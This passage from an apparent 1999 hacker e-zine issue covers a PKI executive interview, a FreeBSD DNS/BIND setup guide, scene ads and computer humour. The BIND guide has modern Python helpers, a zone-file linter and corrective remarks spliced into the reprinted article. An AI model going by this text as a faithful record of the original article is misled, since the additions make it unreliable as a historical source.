       with an Entrust certificate authority, into a network of PKI networking. 
       And we really see that as an innovation that the market has not yet
       anticipated. The evolution will then give customers choices and the
       ability to scale their networks based on what they've bought to date. 
       
       
       InfoWorld: Has that interoperability created a different kind of
       competition between Entrust and your competitors? 
       
       
       Ryan: We have always worked with large enterprises and basically delivered
       a guaranteed security system that they could buy and integrate every
       application into it, and have single sign-on and consistent policies and
       practices. 
       
       
       Our competitors are more focused around the authentication market. They
       don't provide encryption or digital signature, they really count on all
       the various applications to embed that technology.  So we really don't
       compete that often, head-to-head. But I think you'll see, as we migrate
       through this year, a much larger movement with our service provider
       program. 
       
       
       We have partnerships with many service providers, which are more analogous
       to the VeriSign model, but with the full Entrust product suite, combined
       with our ability to implement Entrust Worldwide, a global network that
       we've just created. We'll be able to create really hybrid PKI networks
       where a piece of the PKI is on the customer's premises, and controlled by
       them. 
       
       
       Another piece of the PKI might be controlled by a service provider, and we
       can connect them together seamlessly to be able to enable PKI networking
       and then extend that web of trust to other companies, so that you can
       create a community of interest to conduct electronic commerce. 
       
       
       InfoWorld: If digital certificates are all going to interoperate, how are
       companies going to differentiate themselves from their competitors? 
       
       
       Ryan: That part is going to be an exciting revolution because it will
       evolve very similarly to the credit card business, and I believe that the
       card or the certificate will become a brand position. I might have a
       Citibank Certificate just like I have a Citibank MasterCard. 
       
       
       And I can see that there will be a battle for that identity, and I really
       believe you're going to find there are credentials that you can use across
       a number of services, and that credential may be issued by a bank, or a
       telephone company, or a government. And then I think that most
       organizations who really care about branding and positioning will issue
       certificates to their customers. So a person will end up with probably the
       same number of certificates as they have credit cards. 
       
       
       InfoWorld: Do you think the cessation of year-2000 projects is going to
       have an effect on the adoption of security products and specifically PKI
       systems? 
       
       
       Ryan: Certainly there's no doubt, it's a very critical element that's on
       the mind of every CIO. I think it's helping accelerate PKI in the first
       six months of the year because I think behind year 2000, many of our
       corporate customers are telling us security is the next, No. 2 critical
       item. And they have to get it fixed, but they want to get going right
       away, before the latter part of the year comes when they're fearful that
       they're going to be a little bit busy with year-2000 testing, if they
       haven't got there yet. 
       
       
       In the second half of the year, we've pretty much said it could slow down
       as far as implementation goes. But we actually think that people are going
       to solve a lot more of the problem than they thought, and are actually
       going to be in a position to have the ability to buy the technology for
       implementation in the year 2000. 
       
       
       We're cautiously optimistic right now, but we actually see it as an
       accelerator in the short term, and then we'll be waiting and seeing what
       happens. We also have seen though -- without doubt -- once the year-2000
       bug is done, everybody has said security will become the next No. 1
       priority. So I think that that speaks well for the position that we see
       emerging in the enterprises. 
       
       @HWA     
               
       -=-----------------------------------------------------------------------=--
       
         Special section: Port number assignments, setting up DNS and BIND under FreeBSD
          
       -=-----------------------------------------------------------------------=--
      
      
       
  SP.01 Port # assignments 
        ~~~~~~~~~~~~~~~~~~~
        
        This comes up so frequently I've decided to include it in this issue. - Ed 
          
        The authoritative list is IANA's port-numbers file:
        http://www.isi.edu/in-notes/iana/assignments/port-numbers
        A local copy, port-numbers.txt, is included in the zipped version of this issue.
        
        
       
       
       
       @HWA
       
       
 SP.02 Setting up DNS and BIND under FreeBSD
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       
       
       Featured Articles: DNS and BIND  
             
             from http://www.freebsdzine.org/199902/features/dns.shtml

       ## DNS and BIND
       ## Damon Slachter [ razorz@jagged.net ]

       With domain names becoming the "thing to have" these days, some people are feeling left out. If you are one of those people
       this article just might be for you. I will be concentrating on the BIND implementation of DNS and hopefully, by the end of
       reading this you will have a fully functional bind server. 

       What is BIND? 

        BIND (Berkeley Internet Name Domain) is the implementation of the Domain Name System, or DNS, developed at
        Berkeley and shipped with the 4.3BSD UNIX operating system, where Kevin Dunlap maintained it. Since its early
        release for 4.3BSD, BIND has been ported to virtually all flavors of UNIX and to Microsoft Windows NT. BIND is
        now maintained by the Internet Software Consortium. 

        Before we start, I will assume you know basic UNIX commands such as ls, cd, cp and mkdir. If not, my best
        advice is to hang around #FreeBSD on Undernet or find a basic UNIX tutorial. With that said, you're ready to
        enter the realm of DNS and BIND. 

       Installing the bind8 server is a simple task and can be achieved by doing the following, 

               # cd /usr/ports/net/bind8
               # make
               # make install

       By executing these few commands you tell the makefile to download the source for bind8, compile it and then install it. Now
       that the Bind server is installed, we get into the config files themselves. 

               # cd /etc
               # ls

        In the /etc directory you should have the file named.conf. If it is missing, create it; if it exists, edit it so
        that it contains the following. 

           options {
                   directory "/etc/namedb/";       // where the zone files named below live
           };

           zone "jagged.net" in {                  // domain you control/own
                   type master;
                   file "db.jagged";               // zone file for the domain
           };

           zone "159.243.207.in-addr.arpa" in {    // reverse zone for 207.243.159.x
                   type master;
                   file "db.207.243.159";          // zone file holding the PTR records
           };

           zone "0.0.127.in-addr.arpa" in {        // reverse zone for the loopback network
                   type master;
                   file "db.127.0.0";              // zone file for 127.0.0.x
           };

           zone "." in {                           // root hints
                   type hint;
                   file "db.cache";                // list of the root name servers
           };

        That's basically it for the /etc/named.conf file; here are a few pointers. 

        Pointers for named.conf 

                zone "159.243.207.in-addr.arpa" in {

        This zone holds the reverse (address-to-name) information for the Class C block 207.243.159.0/24. Do not copy
        159.243.207: build the name from your own block by dropping the last octet and writing the remaining three in
        reverse order, least significant first, followed by in-addr.arpa. The reverse zone for 192.168.10.0/24, for
        instance, is 10.168.192.in-addr.arpa. 

       Now its time to get the actual domain database files (ie: db.jagged) setup. 

               # cd /etc
               # mkdir namedb
               # ls

        You will also need the root hints file: ftp to rs.internic.net, download /domain/named.root, save it in
        /etc/namedb under the name db.cache and you're good to go. named only uses it to find the root servers, but keep
        it current. 

       This is where the reverse names for your IP's are created. 

        In the /etc/namedb directory, use your favourite editor, be it vi, ee or pico, to create three files. 

               # pico db.127.0.0

       In db.127.0.0 file you need the following: 

        ; SOA: primary name server, then the zone contact's mailbox (hostmaster@jagged.net, @ written as a dot)
        @ IN SOA ns1.jagged.net. hostmaster.jagged.net. (
                1         ; Serial #
                10800     ; Refresh after 3 hours
                3600      ; Retry after 1 hour
                604800    ; Expire after 1 week
                86400 )   ; Minimum TTL of 1 day

                IN NS ns1.jagged.net.
                IN NS ns2.jagged.net.

        1 IN PTR localhost.

        The "IN NS nsX.jagged.net." lines should name your own DNS server's hostname, such as sun.jagged.net. or
        hellspawn.jagged.net.; you can also list your ISP's name server as the secondary. The second name in the SOA
        record is not a name server but the zone contact's mailbox with the @ written as a dot (hostmaster.jagged.net.
        means hostmaster@jagged.net). BIND 8.2 and later also expect a $TTL line at the top of each zone file; on
        older releases the SOA minimum is used as the default TTL. 

        ***** TIP: The serial number must be increased every time you edit the file, otherwise secondary servers will
        never pick up the change (they transfer the zone only when the serial has grown). The serial is a 32-bit
        unsigned integer, so the usual convention is YYYYMMDDnn (year, month, day, then a two-digit counter for edits
        on the same day), e.g. 1999012101. A twelve-digit timestamp such as 199901210230 does not fit in 32 bits and
        cannot be used. ***** 
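        The two chores above, naming the reverse zone for an address block and keeping the serial growing, are easy
        to get wrong by hand. The following Python helpers are an added example for this guide, not code from the
        article, from BIND or from FreeBSD; jagged.net and 207.243.159.0/24 are the article's sample values, and the
        YYYYMMDDnn serial convention and the RFC 1982 comparison are standard DNS practice rather than anything the
        article prescribes.

```python
"""Two bookkeeping helpers for the reverse zone name and the SOA serial.

Added example for this guide, not code from the article or from BIND.
The values jagged.net and 207.243.159.0/24 are the article's samples.
"""
import datetime
import ipaddress

SERIAL_MAX = 2**32 - 1  # an SOA serial is a 32-bit unsigned integer (RFC 1035)


def reverse_zone(block):
    """in-addr.arpa zone name for an IPv4 block on an octet boundary.

    '207.243.159.0/24' -> '159.243.207.in-addr.arpa': the octets fixed by the
    prefix are written least significant first, the step the article only
    implies when it says "minus the last number".
    """
    net = ipaddress.ip_network(block, strict=True)  # rejects host bits set
    if net.version != 4 or net.prefixlen not in (8, 16, 24):
        raise ValueError("expected an IPv4 block with a /8, /16 or /24 prefix")
    fixed = str(net.network_address).split(".")[: net.prefixlen // 8]
    return ".".join(reversed(fixed)) + ".in-addr.arpa"


def ptr_owner(ip, block):
    """Owner label of the PTR record for `ip` inside reverse_zone(block).

    '207.243.159.93' in a /24 -> '93', the article's `93 IN PTR jagged.net.`.
    In a /16 both host octets appear, again reversed: '93.159'.
    """
    net = ipaddress.ip_network(block, strict=True)
    addr = ipaddress.ip_address(ip)
    if addr not in net:
        raise ValueError(f"{ip} is not inside {block}")
    host = str(addr).split(".")[net.prefixlen // 8 :]
    return ".".join(reversed(host))


def serial_fits(serial):
    """True if a proposed serial fits in 32 bits.

    The article's YYYYMMDDTTTT form (199901210230) does not; YYYYMMDDnn
    (1999012101) does and leaves room for 100 edits a day.
    """
    return 0 <= serial <= SERIAL_MAX


def next_serial(current, yyyymmdd=None):
    """Next YYYYMMDDnn serial after `current` for the given day (default: today).

    Starts at <date>00 on a new day and otherwise just increments, so the
    value always grows and a secondary will notice the change.
    """
    if not serial_fits(current):
        raise ValueError("current serial does not fit in 32 bits")
    if yyyymmdd is None:
        yyyymmdd = int(datetime.date.today().strftime("%Y%m%d"))
    base = yyyymmdd * 100
    candidate = base if current < base else current + 1
    if not serial_fits(candidate):
        raise ValueError("serial would overflow 32 bits")
    return candidate


def serial_is_newer(new, old):
    """RFC 1982 comparison: what a secondary uses to decide whether to transfer.

    `new` counts as newer when it lies less than 2**31 ahead of `old`
    modulo 2**32; a serial that merely changed to a smaller number does not.
    """
    diff = (new - old) % 2**32
    return 0 < diff < 2**31


if __name__ == "__main__":
    print(reverse_zone("207.243.159.0/24"))                 # 159.243.207.in-addr.arpa
    print(ptr_owner("207.243.159.93", "207.243.159.0/24"))  # 93
    print(next_serial(1, 19990121))                         # 1999012100
    print(serial_fits(199901210230))                        # False
```

        Run it as a script to see the article's values come out; in a real setup you would call next_serial() from
        whatever edits the zone file and refuse to write a serial that serial_is_newer() does not consider an increase.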

       Next, 

               # pico db.207.243.159

        In the filename, 207.243.159 is replaced by the first three octets of your own block; the filename is only a
        label, the reversed order matters in the zone name in named.conf. 

        ; SOA: primary name server, then the zone contact's mailbox
        @ IN SOA ns1.jagged.net. hostmaster.jagged.net. (
                1       ; Serial
                10800   ; Refresh after 3 hours
                3600    ; Retry after 1 hour
                604800  ; Expire after 1 week
                86400 ) ; Minimum TTL of 1 day

                IN NS ns1.jagged.net.
                IN NS ns2.jagged.net.

        93      IN PTR  jagged.net.

        Every name on the right-hand side of the NS and PTR records must end in a dot. Without it the name is taken to be
        relative to the zone, so ns1.jagged.net would be read as ns1.jagged.net.159.243.207.in-addr.arpa. 

        This is the file that specifies the reverse DNS for your Internet IP addresses. In most cases your ISP, not you,
        holds the delegation for the reverse zone, so the rest of the Internet keeps seeing whatever the ISP publishes;
        set the zone up anyway so that your own server and clients get consistent answers, and ask the ISP either to
        delegate the zone to your server or to add the PTR records for you. 

        The line 93 IN PTR jagged.net. is what maps the last octet, 93, back to a name, for example: 

               > nslookup 207.243.159.93
               Server:  jagged.net
               Address:  207.243.159.93

               Name:    jagged.net
               Address:  207.243.159.93

       For a user with only a hostname such as sun.jagged.net you would just use 93 IN PTR sun.jagged.net. 

       Now comes the fun part, creating your hostnames! 

               # pico db.jagged

       Where jagged is the name of YOUR actual domain or the hostname your ISP has set for you, i.e.: sparcstation.jagged.net. You
       may still use the db.jagged file for this but you must specify sparcstation.jagged.net in the /etc/named.conf file. 

        ; SOA: primary name server, then the zone contact's mailbox
        @ IN SOA ns1.jagged.net. hostmaster.jagged.net. (
                1       ; Serial
                10800   ; Refresh after 3 hours
                3600    ; Retry after 1 hour
                604800  ; Expire after 1 week
                86400 ) ; Minimum TTL of 1 day

                IN NS ns1.jagged.net.
                IN NS ns2.jagged.net.

        localhost       IN A    127.0.0.1
        jagged.net.     IN A    207.243.159.93

        ; hosts named in NS and MX records must have A records, not CNAMEs
        ns1             IN A    207.243.159.93
        ns2             IN A    207.243.159.93
        mail            IN A    207.243.159.93

        ftp             IN CNAME        jagged.net.
        www             IN CNAME        jagged.net.

        jagged.net.     IN MX   10      mail.jagged.net.

       Here is a brief explanation of what these lines mean. 

               jagged.net.     IN A    207.243.159.93

       This is the forward lookup for the jagged.net domain. 

                www    IN CNAME        jagged.net.

       This creates a hostname (a "sub domain") under the root domain jagged.net, as an alias that resolves to the same address as jagged.net.

       The MX ("Mail Exchanger") record is easiest to explain with a scenario like the following.

       Imagine you are a network admin and your company needs a separate server just for email. Sure, no problem, but now people
       have to send email to foobar@mail.jagged.net. This isn't a problem but foobar@jagged.net looks much better to you and your
       boss so you do the following: 

               jagged.net.     IN      MX      10 mail.jagged.net.

       Meaning the "Mail Exchanger" for jagged.net. is mail.jagged.net.; the 10 is the preference, and when a domain has several MX
       records the lowest number is tried first. MX gets much more complicated than this, so I will stop here.

       Now that all of your config files are ready you can start the BIND server.

               # /usr/local/sbin/named

       This starts the named server. 

       ***** TIP: If you make changes to your db files just use the command
             killall -HUP named to reload your named server. ******

       Now you are ready to test out your named server for the first time. You might want to change /etc/resolv.conf so it points to
       your name server: 

               domain  JAGGeD.net
               nameserver 207.243.159.93

       Type nslookup and you should see something along the lines of 

               > nslookup
               Default Server:  jagged.net
               Address:  207.243.159.93

               >

       If you don't see something close to this then something isn't configured right. Go back through the steps mentioned above and
       see if you typed something wrong. 
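       As a check to run over db.jagged and the reverse db file before you HUP named, here is an added example (my code, not the guide's or BIND's) that parses the zone syntax used above and flags a dotted target with no trailing dot, an MX with no preference number, and an NS or MX that points at a CNAME. The sample zones inside it are constructed to mirror the guide's files, and hostmaster.jagged.net. is an assumed contact name.

```python
"""Minimal linter for BIND zone files (added example, not the guide's or BIND's code).

Parses the syntax the guide uses ('@' origin, ';' comments, parenthesised SOA,
NS/A/CNAME/MX/PTR with inherited owners) and flags three common slips:
dotted targets with no trailing dot (named appends the origin), MX records
with no preference number, and NS/MX targets that are CNAMEs (RFC 2181 10.3).
"""

def _logical_lines(text):
    """Strip comments, fold '( ... )' groups (the SOA) onto one line, drop blanks."""
    out, buf, depth = [], [], 0
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].rstrip()
        if not line.strip():
            continue
        depth += line.count("(") - line.count(")")
        buf.append(line.replace("(", " ").replace(")", " "))
        if depth == 0:
            out.append(" ".join(buf))
            buf = []
    return out

def qualify(name, origin):
    """Turn a zone-file name into an FQDN the way named does."""
    if name == "@":
        return origin
    return name if name.endswith(".") else f"{name}.{origin}"

def parse_zone(text, origin):
    """Return [(owner_fqdn, rtype, rdata_tokens)]; a blank owner repeats the last one."""
    records, last_owner = [], "@"
    for line in _logical_lines(text):
        tokens = line.split()
        if not line[0].isspace():          # owner written on this line
            last_owner = tokens.pop(0)
        if tokens and tokens[0] == "IN":   # the class field is optional
            tokens.pop(0)
        records.append((qualify(last_owner, origin), tokens[0], tokens[1:]))
    return records

def lint_zone(text, origin):
    """Return a list of findings; an empty list means the zone passed."""
    records = parse_zone(text, origin)
    cnames = {owner for owner, rtype, _ in records if rtype == "CNAME"}
    findings = []
    for owner, rtype, rdata in records:
        if rtype == "MX":
            if len(rdata) != 2 or not rdata[0].isdigit():
                findings.append(f"{owner} MX: missing preference number")
                continue
            target = rdata[1]
        elif rtype in ("NS", "CNAME", "PTR"):
            target = rdata[0]
        else:
            continue
        if "." in target.rstrip(".") and not target.endswith("."):
            findings.append(f"{owner} {rtype}: '{target}' has no trailing dot, "
                            f"named reads it as {qualify(target, origin)}")
        if rtype in ("NS", "MX") and qualify(target, origin) in cnames:
            findings.append(f"{owner} {rtype}: target {target} is a CNAME, "
                            "it needs an A record of its own")
    return findings

# Constructed samples mirroring the guide's db files (not real zone data).
BROKEN_FORWARD = """\
@ IN SOA ns1.jagged.net. hostmaster.jagged.net. ( 1 10800 3600 604800 86400 )
        IN NS ns1.jagged.net.
        IN NS ns2.jagged.net.
localhost       IN A     127.0.0.1
jagged.net.     IN A     207.243.159.93
ns1             IN CNAME jagged.net.
ns2             IN CNAME jagged.net.
mail            IN CNAME jagged.net.
www             IN CNAME jagged.net.
jagged.net.     IN MX    mail.jagged.net.
"""
REVERSE_ZONE = """\
@ IN SOA ns1.jagged.net. hostmaster.jagged.net. ( 1 10800 3600 604800 86400 )
        IN NS ns1.jagged.net
        IN NS ns2.jagged.net.
93      IN PTR jagged.net.
"""
FIXED_FORWARD = """\
@ IN SOA ns1.jagged.net. hostmaster.jagged.net. ( 2 10800 3600 604800 86400 )
        IN NS ns1.jagged.net.
jagged.net.     IN A     207.243.159.93
ns1             IN A     207.243.159.93
mail            IN A     207.243.159.93
www             IN CNAME jagged.net.
jagged.net.     IN MX 10 mail.jagged.net.
"""

if __name__ == "__main__":
    for text, origin in ((BROKEN_FORWARD, "jagged.net."),
                         (REVERSE_ZONE, "159.243.207.in-addr.arpa."),
                         (FIXED_FORWARD, "jagged.net.")):
        print(lint_zone(text, origin) or ["clean"])
```

       A secondary server only transfers a zone whose SOA serial has gone up, so bump the serial with every edit before the HUP.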

       I hope you enjoyed the first edition of the DNS/Bind server startup guide and have found it useful. If you have ANY questions
       please feel free to join us in #FreeBSD on the Undernet IRC servers. My nickname is RazorZ and I would be more than happy
       to help you with any problems you might encounter. 

       Good luck! 

       -- Damon Slachter
       -- a.k.a. RazorZ  
    
                
 AD.S  ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
       http://come.to/Canc0n99  http://come.to/Canc0n99 http://come.to/Canc0n99http:j
       http:/                                                               99 http:o
       http:/  login: sysadmin                                              n99 httpi
       /come.  password:                                                    tp://comn
       to/Can                                                               me.to/Cat
       c0n99   SYSTEM NEWS: Canc0n99 is looking for more speakers and       Canc0n99h
       http:/  industry people to attend with booths and talks.             99 http:e
       /come.  you could have a booth and presentation for the cost of      p://comel
       http:/  little more than a doorprize (tba) contact us at our main    n99http:i
       http:/  address for info hwa@press.usmc.net, also join the mailing   n99http:s
       http:/  for updates. This is the first Canadian event of its type    invalid t
       403 Fo  and will have both white and black hat attendees, come out   logged! !
       404 Fi  and shake hands with the other side... *g* mainly have some  IP locked
       ome.to  fun and maybe do some networking (both kinds). see ya there! hostname 
       http:/                                                               x99http:x
       o/Canc                                                               x.to/Canx                 
       http://come.to/Canc0n99  http://come.to/Canc0n99 http://come.to/Canc0n99http:x
       o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx

        http://come.to/Canc0n99  http://come.to/Canc0n99  http://come.to/Canc0n99 
       !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
        
       $$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$
       !                                                                            !       
       $                                                                            $       
       !     *** IT HAS BEEN FOUR YEARS! ***    FREE KEVIN MITNICK NOW!!!! **       !
       $                                                                            $              
       !                                                                            !
       $$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$

       www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
       n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
       m www.2600.com ########################################ww.2600.com www.freeke
       vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
       com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
       kevin.com www.k#             FREE KEVIN!              #in.com www.kevinmitnic
       k.com www.2600.########################################om www.2600.com www.fre
       ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
       k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

       
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
       *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
       *   One of our sponsors, visit them now: www.csoft.net                        *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
       * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


         //////////////////////////////////////////////////////////////////////////////
        //  To place an ad in this section simply type it up and email it to        //
       //        hwa@press.usmc.net, put AD! in the subject header please. - Ed    //
      //////////////////////////////////////////////////////////////////////////////


     @HWA

 HA.HA Humour and puzzles ...etc
       ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Don't worry. worry a *lot*




       
       Sysadmin Interview Qs
       
       Path: athena.cs.uga.edu!emory!wupost!uunet!uunet.ca!xenitec!looking!funny-request
       From: zoo@cygnus.com (david d `zoo' zuhn)
       Newsgroups: rec.humor.funny
       Subject: Job Interview pointers....
       Keywords: original, chuckle
       Message-ID: <S45c.6b76@looking.on.ca>
       Date: 5 Sep 92 23:30:03 GMT
       Organization: Cygnus Support -- +1 415 322 3811
       Lines: 44
       Approved: funny@clarinet.com
       
       I was on the interviewer side of a job interview for the first time a
       few days ago, and in preparation I asked many people for help and
       advice.  I received a set of sample questions from a best friend in a
       previous life.  
       
       All credit or blame for the following truly belong to Brian R. Smith
       (brsmith@cs.umn.edu), and is reproduced here by permission:
       
       
          "How do you work in a team situation when all the other team
          members are fools and idiots?"
       
          "How well do you program under the influence of hard drugs?"
       
          "Have you ever beaten or killed a co-worker?"
       
          "Give me a rough estimate of the maximum dollar amount that you've
          stolen from each of your previous employers."
       
          "Do you object to bullwhips in the workplace?"
       
          "Emacs or vi?"
       
          "You have a large network of Suns being used by secretaries for word
          processing in FrameMaker.  Which GNU packages would you install for
          your own entertainment, and how would you justify them later?"
       
          "You see a wounded puppy bleeding and whimpering on the side of the
          road while you're running to work to fix a downed computer that tens
          of users are waiting for.  Do you let the puppy die?"  "Why not?"
       
          "How much of your workday would you waste by reading news?"
       
          "Recite the GNU Manifesto."
       
          "How many clients (30% diskless, 60% dataless, 10% /var/spool/mail
          only) can a Sun 600MP server serve simultaneously, and what relation
          does this have to angels and pinheads?"
        --
        
        -=-
       
       
       

                                                                   
       Hacker Syndrome Paper

                                 The Hacker Syndrome 
                                    By Tad Deriso 
            
        
       There is some compelling force in all Hackers that seems to draw them 
       to their computers every day.  Why they get up at 4am to use the 
       modem, and why they continue to rack up a truly incredible phone bill 
       is beyond me.  
       
       Most computer areas, at your home or at your office, tend to be messy.  
       Even if you try to keep it clean, it is truly impossible.  Whether it be 
       empty Coke cans laying all around, soldering devices, electric diodes, 
       computer parts, or integrated circuits, it is not only a pain for your 
       mother to look at, but a prime Russian ICBM missile target as well.  
       
       There is much detail needed to explain a Hacker.  For instance, 
       instead of organizing his clothes by color, best ones, or style, he 
       organizes his by pile.  Also, he likes to sing songs such as, "Let's 
       get Digital", "We all live in a yellow subroutine", and "Somewhere 
       over the RAMbow".  
       
       Most Hackers do well in school.  The reason is not to impress their 
       teachers, not to get money from their parents, and not to be educated, 
       but they do it so they can hopefully get a scholarship to MIT.  You 
       can't blame them, though, if they are looking out into space.  It 
       might be because they are worried if MCI traced the calls that they 
       sent to NORAD.  
       
       All Hackers, big or small, love computers, whether they be Trash-80's 
       or an IBM 360/VM workstation.  When they get on one, it's mighty hard 
       to get them off of it.  
       
       There are 2 types of Hackers.  One who likes to crash local BBS's, and 
       the one who writes programs in Assembly Language.  The Hacker who 
       crashes systems is the one that most people think that a Hacker is.  A 
       typical example of one is John Fredrickson (A.K.A. "The Phone Man").  
       He loves to crash computers, and break into illegal systems.  The ones 
       that he has gotten in to are MCI, CitiBank, school systems, IBM, 
       Southern Bell, and Georgia Tech, not to mention all the ones in 
       between.  
       
       The second type of Hacker is the programmer.  He writes games, 
       utilities, and anything else that he can think of.  Take for example, 
       John Harris, a freelance software writer for On-Line Software Co.  
       John had a brainstorm one day, and decided to write Frogger for the 
       Apple.  He thought that it would take about 3 weeks to complete.  He 
       started on Frogger a week late, because of the complicated music set 
       that he had to write.  After two months, he was almost done.  He 
       decided to take a break and go to the Software Expo.  He decided to 
       take his nearly completed Frogger, and show it to the consumers at the 
       show.  He also took with him the only back-up copy, in case the main 
       disk did not boot.  
       
       While at the fair, he was talking to the Manager about getting a 
       booth.  He had his disks with him.  Then, when he got a booth 
       reserved, he reached down to get his disks, and they were gone!  All 
       his hard work, including the MultiLevel character generator, music 
       lines, disk subroutines, assembly routines, debugging programs, etc.  
       All gone.  
       
       After that tragedy, John was in a deep depression.  He finally started 
       working on it again in 3 months.  He completed it in 4 months and 3 
       days.  
       
       
       Part Two: 
       
       Hackers always take time off.  There is always one way to notice a 
       true Hacker.  At a party, the true Hacker is the one in the corner 
       talking about operating system security and how to get around it.  At 
       the beach, the True Hacker is the one drawing flow charts in the sand.  
       At a football game, the true Hacker is the one comparing the football 
       plays against a simulation printed on 11 by 14 fanfold paper.  
       
       Most Hackers work for the U.S. Government-- mainly the Department of 
       Defense.  You can see the best Hackers at the Jet Propulsion 
       Laboratory in California.  
       
       What sort of environment does a Hacker function best in?  No, not a 
       heated room with a clean table and disks organized neatly, but they do 
       best in rooms that have line-printed Snoopy calendars from the year 
       1969.  They do not know how to cook, so they survive on Twinkies and 
       coffee.  Instead of wasting electricity for a heater, they spend it on 
       air-conditioners to cool off their computer system in mid-January when 
       the temperatures are below freezing.  They wear layers and layers of 
       clothing to keep the body heat in.  When you see one of these people, 
       instead of a Hacker coming into your mind, you think that he is about 
       to go on a Polar expedition somewhere in the North Pole.  
       
       Hackers also like to hang around arcades.  (This is also true for 
       kids, little old ladies, and fighter pilots.) There, secluded in their 
       own environment, Hackers can talk freely on computer hints and short 
       cuts while playing Pac-Man, or Joust.  
       
       All Hackers like Graphics.  They like low-resolution, but prefer high-
       resolution the best.  These graphics, such as Sine waves, rotating 3-D 
       boxes, and little balloons, are confined to the limits of a systems 
       capability.  The older more experienced Hackers are the ones who are 
       lucky enough to get to work on a VAX system, and maybe even a CRAY-1 
       SuperComputer.  If they use these, they have only the limits of their 
       imagination to stop them.  
       
       Most Middle School Hackers between the ages of 10 through 14, like to 
       use computers to do reports on, and play games.  Some of these younger 
       generation Hackers have gotten into BASIC programming.  
       
       Some people, like to impress real Hackers by making them think that 
       they know everything.  There is a certain name for this kind of 
       person.  He is a Sub-Hacker (Intillectuous dumbfoundeth).  For 
       instance, you come up to them one day, and say,"Hey so-and-so what 
       does BASIC stand for?" and you could sit there for days, and he would 
       act like the answer was on the tip of his tongue, when it was probably 
       in his toes.  It is people like this that give Hackers a bad name.  
       
       
       Part Three: 
       
       All Hackers have certain rules that they go by.  One is to never call 
       long distance on Monday, because of the high phone charge.  Another is 
       If builders built buildings the way programmers wrote programs, the 
       first woodpecker that comes along would destroy civilization.  Another 
       is, if the computer accepts a program on the first run without any 
       errors, either there is a malfunction, or it must be a dream.  
       
       Hackers are a unique breed.  Combining intelligence, personality, and 
       a moral sense of good taste.  A Hacker enjoys the environment that 
       appeals to him the most.  Such as, the computer room, the arcade, 
       science lab, or the Atari downstairs.  They like to be alone.  
       Secluded in their own thoughts, thinking of what the password could be 
       to log on to General Electric.  Hackers are the people who are going 
       to make our future brighter, and more exciting in the field of 
       electronics, data processing, artificial intelligence, and 
       programming.  We need to support these people in all the ways that we 
       can, so we will be assured of a happier future in the world of 
       technological advancements.  
                                                                     
       -=-  
         
       Awesome Unix Chdir Program

       Path: athena.cs.uga.edu!emory!swrinde!zaphod.mps.ohio-state.edu!uunet.ca!xenitec!looking!funny-request
       From: baur@mdcbbs.com (Steve Baur)
       Newsgroups: rec.humor.funny
       Subject: NEED HELP FAST !!!!!!!!!
       Keywords: original, computer, smirk
       Message-ID: <S425.63b1@looking.on.ca>
       Date: 12 Jul 92 23:30:04 GMT
       Lines: 58
       Approved: funny@clarinet.com
       
       This composition is original, although the subject is not.
       --------------------------- Cut Here---------------------------------
       Newsgroups: comp.unix.questions
       Subject: NEED HELP FAST !!!!!!!!!
       From: cs245@cs.somewhere.edu (The Unknown Hacker)
       Date: 7 Apr 92 12:55:45 EDT
       Organization: UNIX Guru's R Us!
       
       
       HI, EVERYBODY!!!!
       Sorry if this is a FAQ, but I've heard that a FAQ is something
       everybody already knows, but since I don't know the answer to this
       everybody doesn't know it, so it can't be a FAQ, so here I go ...
       
       I've just created about the most Awesome change directory program ever
       written.  If it doesn't find the target directory through an
       exhaustive CDPATH search, it uses the most sophisticated spelling
       corrector (based on a thorough analysis of Webster's on-line
       dictionary, and a list of the 1000 most common directory names on Unix
       systems throughout the world) to try to find a match that way.  If
       that fails, then it tries to create the directory, and if that fails,
       it opens /dev/uri-geller, and reads the mind of the invoker to try to
       figure out what to do.  It executes with almost 0 impact on system
       resources, and is most truly the finest/tightest code ever to grace
       the memory of a computer.
       
       The only problem is that it doesn't work.  No matter how I've tried,
       once I've done that last chdir (and I've tried doing several identical
       chdir(2)'s in a row to see if that would make the directory change
       more "sticky" but that didn't work) I always end up where I started in
       the shell I started my program in.  I've tried setting the PWD, and
